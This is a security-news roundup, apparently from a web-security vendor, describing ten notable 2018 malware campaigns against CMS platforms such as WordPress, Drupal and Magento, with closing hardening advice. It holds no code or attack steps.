Top 10 Malware Campaigns against WordPress, Drupal and Joomla websites in 2018

Read Time: 7 min.

In 2018, tens of millions of websites running popular CMSs were hacked, infected with ransomware and exploited for other criminal purposes.

Third-party content management systems (CMS) provide the software behind by far the greatest number of websites on the internet — the leading examples being WordPress, Joomla and Drupal. These platforms are used by individual bloggers, large-scale content publishers, and even the largest corporations.

They are also the most attacked category of website. For example, a recent report estimated that even among up-to-date and patched websites, as many as 46% of WordPress, 19% of Joomla, and 18% of Drupal sites were infected with some form of malware.

Here we look at ten of top most interesting or important malwares and malware campaigns directed against CMS systems during 2018.

10: BabaYaga – the Anti-Virus Virus

When: June 2018

Which Platform: WordPress, Joomla, Drupal

BabaYaga, a WordPress-focused malware discovered by Defiant’s Wordfence team in June, may be one of the least harmful malware campaigns of 2018. However, it’s noteworthy as a curiosity, as its behavior and protocols are highly unusual – perhaps even unique – among malware. BabaYaga was a highly sophisticated malware, with scan-evasion and self-reinfection techniques that placed it among the most sticky and troublesome to remove. However, the payload for the attackers was nothing more sinister than an affiliate marketing scheme.

Infected sites would host hidden pages full of SEO spam designed to attract search engines, and visitors would be redirected to irrelevant online stores. The attacker presumably earned a commission on any purchases made. BabaYaga’s most curious features, however, included functionality to otherwise preserve and protect infected sites. WordPress sites would be kept automatically updated by the malware, which even made file backups in case of an update failure. The cherry on top was BabaYaga’s ability to remove other malware that might make its way on to the site, making it an unusual example of an antivirus-virus.

9: DotNetNuke Cryptomining Network

When: January 2018

Which Platform: DotNetNuke

Cryptocurrency was a hot topic throughout 2018, and even as the year began there were already malicious actors attempting to exploit the crypto systems. Beginning in December 2017 with the same Apache Struts vulnerability behind the Equifax breach, an unknown threat actor was setting up a malicious crypto-mining network.

In January 2018, the attacker began to exploit a second vulnerability in the DotNetNuke CMS. These two vulnerabilities were exploited to redirect affected sites’ visitors to a domain which placed a Monero mining application on the victims’ systems. The miner was configured to send the cryptocurrency to a single Monero wallet. By the end of January, the attacker had earned over $12,000 in Monero while using stolen CPU cycles and stolen electricity.

8: XSS Campaign Targets WordPress Plugin

When: November 2018

Which Platform: WordPress

The nature of WordPress as the world’s most prolific CMS hosting platform, and the modular, plugin-based structure of its websites means that plugins can be as viable a target as the platform itself. In fact, plugin vulnerabilities and exploits occur more often than core WordPress vulnerabilities. This was the case with the Accelerated Mobile Pages plugin, AMP for WP.

Identified by the Wordfence team in November, AMP for WP contained a stored XSS vulnerability. This would allow any user with ‘Subscriber’ privileges or above to execute arbitrary code on the target WordPress site. The vulnerability stemmed from a lack of nonce security checks. While it was very swiftly patched, not all WordPress site owners will keep their plugins rigorously up to date. As AMP for WP had over 100,000 active installations at the time, there was plenty of scope for older versions to be exploited.

7: Exploited Vulnerability in GDPR Plugin

When: November 2018

Which Platform: WordPress

This is a returning guest from last week’s list of the top 10 GDPR-related incidents in 2018. There is an unfortunate irony that a plugin focused on security compliance caused a new vulnerability, but the actual risk from this flaw was no joke. Especially given the plugin’s popularity, with over 100,000 active installations at the time that Wordfence discovered it.

A privilege escalation vulnerability, this bug allowed malicious users to create new administrative accounts and gain complete control of the affected website. There was also the potential for threat actors to create persistent backdoors. The vulnerability was patched quickly, but based on changes to affected websites’ URLs, the flaw may have been exploited on approximately 5,000 WordPress sites.

6: Magento’s Re-infecting Malware

When: April 2018 onwards

Which Platform: Magento

Magento is an open-source CMS focused on e-commerce. It is considered one of the leading e-commerce platforms on the internet today, and claims $155 billion’s worth of transactions were handled by the platform over 2018. As such, any vulnerabilities in the platform can be very valuable for attackers.

And 2018 was an active year for Magento attackers. The first incident came in April, when over 1,000 Magento websites were infected with a malware that could scrape credit cards or execute cryptojacking attacks. While steps were taken to combat this campaign, it was not over as early as first thought. In June, it emerged that previously infected websites were re-infecting themselves. Hackers had hidden additional code in the config.php file of the CMS, making it difficult to detect by scanners. Even by as late as November, the average Magento site infected by this or other malware would be re-infected in 10.5 days.

5: Drupalgeddon 2 (and 3)

When: March 2018 onwards

Which Platform: Drupal

In 2014, CMS platform Drupal experienced one of the most destructive code vulnerabilities ever seen by a CMS. Dubbed ‘Drupageddon’ (the L was only added in more recent events) because of its magnitude, it was an SQL injection flaw that allowed remote code execution (RCE) attacks, backdoors, privilege escalation and more. Exploitation of the vulnerability was so widespread that, despite quick patching, site owners were told that if they had not updated within 7 hours of the patch’s release, they should all consider their websites compromised.

While the original Drupageddon was highly damaging to the platform, Drupal did solve the vulnerability and survived. It wasn’t until March 2018 that a similar vulnerability, quickly named Drupalgeddon 2, surfaced. A very similar RCE vulnerability, this was also quickly patched, but not in time to prevent exploitation. Even months later, in June, security researcher Troy Mursch found over 115,000 Drupal websites still vulnerable and hundreds of ongoing exploits. This was further compounded in April when yet another RCE vulnerability emerged and was exploited within hours. This second instance is sometimes considered part of Drupalgeddon 2, sometimes reported as Drupalgeddon 3.

“ It has been a while since such a dangerous and easily exploitable RCE vulnerability has been discovered on such a popular CMS as Drupal, ” commented High-Tech Bridge’s CEO, Ilia Kolochenko, at the time. He warned that the exploit was so simple and so severe that it would be exploited in the wild within hours.

“ Breached websites will likely be used for data theft and further password reuse attacks, as well as for watering hole attacks to distribute ransomware and cryptominers, ” he added.

4: MagentoCore Bank Card Skimmer

When: August/September 2018

Which Platform: Magento

Bigger than the self-reinfecting malware campaign, Magento’s biggest security incident came in late August and early September with the malware that became known as MagentoCore. Uncommonly aggressive and successful, the script was found on over 5,000 domains simultaneously at its peak.

The malware made its way onto a website via bruteforce techniques, hijacking the administrative control panel. The attacker was then able to lock out the legitimate admins by changing passwords for other accounts. MagentoCore skimmed payment details from infected sites by embedding a keylogger into the website’s pages, recording the customer’s information when entered on a payment page.

3: FakeUpdates Campaigns Deliver Banking Malware

When: December 2017 - April 2018

Which Platforms: Joomla, WordPress, SquareSpace, Drupal

The more popular any CMS becomes, the more frequently its users can expect to come under attack. Usually, thanks to their different infrastructures, individual attacks are restricted to a single platform. However, some attacks can still be viable across multiple platforms. The FakeUpdates campaign that took place over the first quarter of 2018 was one such attack.

Primarily affecting WordPress and other popular CMS platforms Joomla, Drupal and SquareSpace, infected sites would redirect end users to a spoofed update webpage hosted on another compromised website, usually tailored to the user’s browser. If the user fell for the fake update, a trojan would be delivered to their machine. The malware was usually the Chthonic banking malware, but was sometimes reported to be the NetSupport remote access trojan.

2: Master134’s Malvertising Network

When: July 2018

Which Platform: WordPress

In July, Check Point Research uncovered what is undoubtedly the biggest fraudulent advertising and malware distribution scheme of 2018. Making use of 10,000 or more vulnerable WordPress sites, the scheme would redirect traffic to a fraudulent website. This traffic was used to help the site appear more legitimate to AdsTerra, a real-time bidding platform for advertisers. However, there was more to this scheme than just fraudulent advertising revenue.

With a ‘good’ reputation fueled by stolen traffic, Master134 (the name for the hacker bestowed by Check Point) was able to buy advertising space via AdsTerra. But what he delivered was malvertising. The stolen traffic was again redirected to the pages hosting his adverts – which contained various drive-by malwares including trojans, ransomware and bots

1: Botnet Makes WordPress Sites Attack WordPress Sites

When: December 2018

Which Platform: WordPress

While WordPress plugins tend to be more vulnerable and more frequently attacked than the core WordPress framework, this is not always the case. If hackers can find a vulnerability or a way to breach an up-to-date WordPress, it means any other WordPress site is vulnerable to the same attack. Sometimes these attacks don’t even need a zero-day vulnerability, but simply aim to bruteforce WordPress’ security – as with December’s large-scale, organized botnet.

Discovered by the Wordfence team, the botnet used dictionary-based bruteforce attacks to attempt to gain elevated privilege on targeted WordPress sites. If successful, the attack would add new code to the sites, incorporating them into the botnet to attack other WordPress sites. There were already 20,000 infected sites in the botnet when the Wordfence team discovered and began to combat it.

There is no silver bullet that will keep a CMS website secure. Nevertheless, Ilia Kolochenko offers this advice: “ Keeping a CMS and all its components up-to-date is vital to maintain website security. A WAF can help mitigate, or at least reduce, the exploitability of unknown vulnerabilities or vulnerabilities in custom code.

“ Web server security hardening with Content Security Policy and similar security mechanisms can prevent many common exploitation vectors such as XSS and CSRF. Obviously, admin passwords must be strong and unique, and two-factor authentication will never harm.

“ Last but not least, continuous security monitoring has become a de facto standard to ensure web application security. Sometimes you, or your colleagues, may just forget something – four eyes are always better than two. "

Test your web server security hardening, Content Security Policy (CSP) and CMS security with free ImmuniWeb® WebScan.